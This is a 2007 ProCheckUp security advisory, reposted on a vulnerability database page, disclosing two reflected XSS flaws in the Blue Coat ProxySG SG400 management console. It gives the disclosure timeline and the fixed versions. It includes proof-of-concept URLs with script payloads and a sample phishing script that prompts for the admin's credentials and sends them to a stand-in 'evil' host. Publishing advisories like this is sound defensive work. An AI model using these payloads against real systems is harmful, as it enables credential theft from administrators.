Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18340
HistoryNov 02, 2007 - 12:00 a.m.

Two XSS on Blue Coat ProxySG Management Console

2007-11-0200:00:00
vulners.com
37
JSON

PR07-29: Two XSS on Blue Coat ProxySG Management Console

Vulnerability found: 23 July 2007

Vendor informed: 20 August 2007

Vulnerability fixed: 29 October 2007

Advisory publicly released: 1 November 2007

Severity: Medium

Description:

Blue Coat SG400 is vulnerable to a couple of XSS holes.

Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_action/crl_format' / 'name'

Vulnerable server-side script / unfiltered parameter:
'/Secure/Local/console/install_upload_from_file.htm' / 'file'

Notes:

The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to
run.

Successfully tested on:

Model: Blue Coat SG400
Software SGOS 4.2.1.6
Software Release ID: 25173

Proof of concept #1:

https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00

Injected payload:

"<script>alert("XSS")</script>%00

Proof of concept #2:

https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;&lt;!--

Injected payload:

<script>alert("XSS")</script><!–

A neat payload to inject instead of a alert() box would be a phishing attack which would forward the
username and password to a third-party site (the code could be inserted from a third-party site).

i.e.:

<script>
do {
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");
}while(a==null || b==null || a=="" || b=="");

alert("owned!:"+a+"/"+b);window.location="http://evil/?u=&quot;+a+&quot;&amp;p=&quot;+b
</script><!–

Consequences:

An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat
SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within
the context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of
confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in
the Proof of Concept) to unauthorised third parties.

Fixed in:

4.2.6.1, 5.2.2.5

References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability

Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)

JSON